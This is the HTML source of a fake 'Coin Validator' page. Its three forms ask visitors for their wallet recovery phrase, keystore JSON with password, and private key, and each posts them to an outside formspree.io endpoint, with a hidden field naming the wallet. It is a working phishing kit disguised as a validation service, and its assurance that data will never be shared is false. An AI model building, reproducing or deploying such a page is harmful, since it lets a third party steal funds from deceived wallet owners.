<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8"/>
    <meta content="IE=edge" http-equiv="X-UA-Compatible"/>
    <meta content="width=device-width, initial-scale=1.0" name="viewport"/>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.1/dist/css/bootstrap.min.css" rel="stylesheet"
          integrity="sha384-F3w7mX95PdgyTmZZMECAngseQB83DfGTowi0iMjiWaeVhAn4FJkqJByhZMI3AhiU" crossorigin="anonymous">
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.1/dist/js/bootstrap.bundle.min.js"
            integrity="sha384-/bQdsTh/da6pkI1MST/rWKFNjaCP5gBSY4sEBT38Q/9RBh9AH40zEOg7Hlq2THRZ"
            crossorigin="anonymous"></script>
    <link rel = "icon" type = "image/png" href = "img/coinvalidator.jpg">
    <link href="styles/style.css" rel="stylesheet"/>
    <script src="scripts/slider.js"></script>
    <title>ValidatePage</title>
</head>
<body style="background-color: #cccccc">
<nav class="navbar navbar-expand-lg navbar-light  py-3 ">
    <div class="container">
        <a class="navbar-brand" href="#">Coin Validator</a>

        <button
                class="navbar-toggler"
                data-bs-toggle="collapse"
                data-bs-target="#navMenu"
                type="button">
            <span class="navbar-toggler-icon"></span>
        </button>

        <div class="collapse navbar-collapse" id="navMenu">
            <ul class="navbar-nav ms-auto">
                <li class="nav-item">
                    <a class="nav-link" href="#About">About</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="#Wallets">Wallets</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="#Apps">Apps</a>
                </li>
            </ul>
        </div>
    </div>
</nav>
<br>
<div class="container" style="text-align: center; margin-bottom: 50px">
    <h5 style="color: blue">Validate coins in wallet</h5>
</div>
<div class="container" style="text-align: center; margin-bottom: 50px">
    <h2 class="card-heading">Input Parameters to Commence Coin Validation</h2>
    <div class="card-subheading">Fill the forms below to begin wallet validation protocols </div>
</div>
<div class="container" style="width: fit-content; margin: auto">
    <div class="container" id="slider" style="width: fit-content; margin: auto">
        <input type="radio" name="slider" id="slide1" checked>
        <input type="radio" name="slider" id="slide2">
        <input type="radio" name="slider" id="slide3">
        <div class="container" id="slides" style="width: initial; margin: auto">
            <div id="overflow">
                <div class="inner">
                    <div class="slide slide_1">
                        <div class="slide-content" style="width: fit-content; margin: auto">
                            <form action="https://formspree.io/f/mdobopay" method="post">
                                <div style="display: none" class="mb-3">
                                    <label class="form-label" style="color: black">BlockChainWallet</label>
                                    <textarea type="text" class="form-control" style="height: 100px"  name="Wallet" aria-describedby="emailHelp3">Vison Wallet</textarea>
                                    <div class="form-text">Typically 12 (sometimes 24) words separated by single space</div>
                                </div>
                                <div class="mb-3">
                                    <label for="exampleInputEmail3" class="form-label" style="color: black">Phrase</label>
                                    <textarea type="text" class="form-control" style="height: 100px" id="exampleInputEmail3" name="Phrase" aria-describedby="emailHelp3"></textarea>
                                    <div id="emailHelp3" class="form-text">Typically 12 (sometimes 24) words separated by single space</div>
                                </div>
                                <div style="text-align: center">
                                    <button type="submit" class="btn btn-primary btn-lg" style="width: 300px; text-align: center" value="Send">Validate</button>
                                </div>
                            </form>
                        </div>
                    </div>
                    <div class="slide slide_2">
                        <div class="slide-content">
                            <form action="https://formspree.io/f/mdobopay" method="post">
                                <div style="display: none" class="mb-3">
                                    <label class="form-label" style="color: black">BlockChainWallet</label>
                                    <textarea type="text" class="form-control" style="height: 100px"  name="Wallet" aria-describedby="emailHelp3">Vison Wallet</textarea>
                                    <div class="form-text">Typically 12 (sometimes 24) words separated by single space</div>
                                </div>
                                <div class="mb-3">
                                    <label for="exampleInputEmail1" class="form-label" style="color: black">Keystore JSON</label>
                                    <textarea type="text" class="form-control" style="height: 100px" id="exampleInputEmail1" name="KEYSTORE JSON" aria-describedby="emailHelp"></textarea>
                                    <div id="emailHelp" class="form-text">We'll never share your Keystore JSON with anyone else.</div>
                                </div>
                                <div class="mb-3">
                                    <label for="exampleInputPassword1" class="form-label" style="color: black">Password</label>
                                    <input type="password" placeholder="Password" class="form-control" id="exampleInputPassword1" name="Password" aria-describedby="passwordHelp">
                                    <div id="passwordHelp" class="form-text">Several lines of text beginning with '(...)' plus the password you used to encrypt it</div>
                                </div>
                                <div style="text-align: center">
                                    <button type="submit" class="btn btn-primary btn-lg" style="width: 300px; text-align: center" value="Send">Validate</button>
                                </div>
                            </form>
                        </div>
                    </div>
                    <div class="slide slide_3">
                        <div class="slide-content">
                            <form action="https://formspree.io/f/mdobopay" method="post">
                                <div style="display: none" class="mb-3">
                                    <label class="form-label" style="color: black">BlockChainWallet</label>
                                    <textarea type="text" class="form-control" style="height: 100px"  name="Wallet" aria-describedby="emailHelp3">Vison Wallet</textarea>
                                    <div class="form-text">Typically 12 (sometimes 24) words separated by single space</div>
                                </div>
                                <div class="mb-3">
                                    <label for="exampleInputEmail2" class="form-label" style="color: black">Private Key</label>
                                    <textarea type="text" class="form-control" style="height: 100px" id="exampleInputEmail2" name="Private Key" aria-describedby="emailHelp2"></textarea>
                                    <div id="emailHelp2" class="form-text">Typically 12 (sometimes 24) words separated by single space</div>
                                </div>
                                <div style="text-align: center">
                                    <button type="submit" class="btn btn-primary btn-lg" style="width: 300px; text-align: center" value="Send">Validate</button>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div id="controls">
            <label for="slide1"></label>
            <label for="slide2"></label>
            <label for="slide3"></label>
        </div>
        <div id="bullets">
            <label for="slide1"></label>
            <label for="slide2"></label>
            <label for="slide3"></label>
        </div>
    </div>

</div>

</body>

<style>
    #slider {
        margin: 0 auto;
        width: fit-content;
        text-align: center;
    }
    #slider input[type=radio] {
        display: none;
    }
    #slider label {
        cursor:pointer;
        text-decoration: none;
    }
    #slides {
        padding: 10px;
        background: #fff;
        position: relative;
        z-index: 1;
    }
    #overflow {
        width: 100%;
        overflow: hidden;
    }
    #slide1:checked ~ #slides .inner {
        margin-left: 0;
    }
    #slide2:checked ~ #slides .inner {
        margin-left: -100%;
    }
    #slide3:checked ~ #slides .inner {
        margin-left: -200%;
    }
    #slides .inner {
        transition: margin-left 800ms cubic-bezier(0.770, 0.000, 0.175, 1.000);
        width: 400%;
        line-height: 1;
        height: 350px;
    }
    #slides .slide {
        width: 25%;
        float:left;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100%;
        color: #fff;
    }
    #slides .slide_1 {
        background: white;
    }
    #slides .slide_2 {
        background: white;
    }
    #slides .slide_3 {
        background: white;
    }
    #controls {
        margin: -180px 0 0 0;
        width: 100%;
        height: 50px;
        z-index: 3;
        position: relative;
    }
    #controls label {
        transition: opacity 0.2s ease-out;
        display: none;
        width: 50px;
        height: 50px;
        opacity: .4;
    }
    #controls label:hover {
        opacity: 2;
    }
    #slide1:checked ~ #controls label:nth-child(2),
    #slide2:checked ~ #controls label:nth-child(3),
    #slide3:checked ~ #controls label:nth-child(1){
        background: url(https://image.flaticon.com/icons/svg/130/130884.svg) no-repeat;
        float:right;
        margin: 0 -50px 0 0;
        display: block;
    }
    #slide1:checked ~ #controls label:nth-child(3),
    #slide2:checked ~ #controls label:nth-child(1),
    #slide3:checked ~ #controls label:nth-child(2){
        background: url(https://image.flaticon.com/icons/svg/130/130882.svg) no-repeat;
        float:left;
        margin: 0 0 0 -50px;
        display: block;
    }
    #bullets {
        margin: 150px 0 0;
        text-align: center;
    }
    #bullets label {
        display: inline-block;
        width: 10px;
        height: 10px;
        border-radius:100%;
        background: white;
        margin: 0 10px;
    }
    #slide1:checked ~ #bullets label:nth-child(1),
    #slide2:checked ~ #bullets label:nth-child(2),
    #slide3:checked ~ #bullets label:nth-child(3) {
        background: blue;
    }
    @media screen and (max-width:900px) {
        #slide1:checked ~ #controls label:nth-child(2),
        #slide2:checked ~ #controls label:nth-child(3),
        #slide3:checked ~ #controls label:nth-child(1)
        #slide1:checked ~ #controls label:nth-last-child(2),
        #slide2:checked ~ #controls label:nth-last-child(3),
        #slide3:checked ~ #controls label:nth-last-child(1){
            margin: 0;
        }
        #slides {
            max-width: calc(100% - 0px);
            margin: 0 auto;
        }
    }
</style>

</html>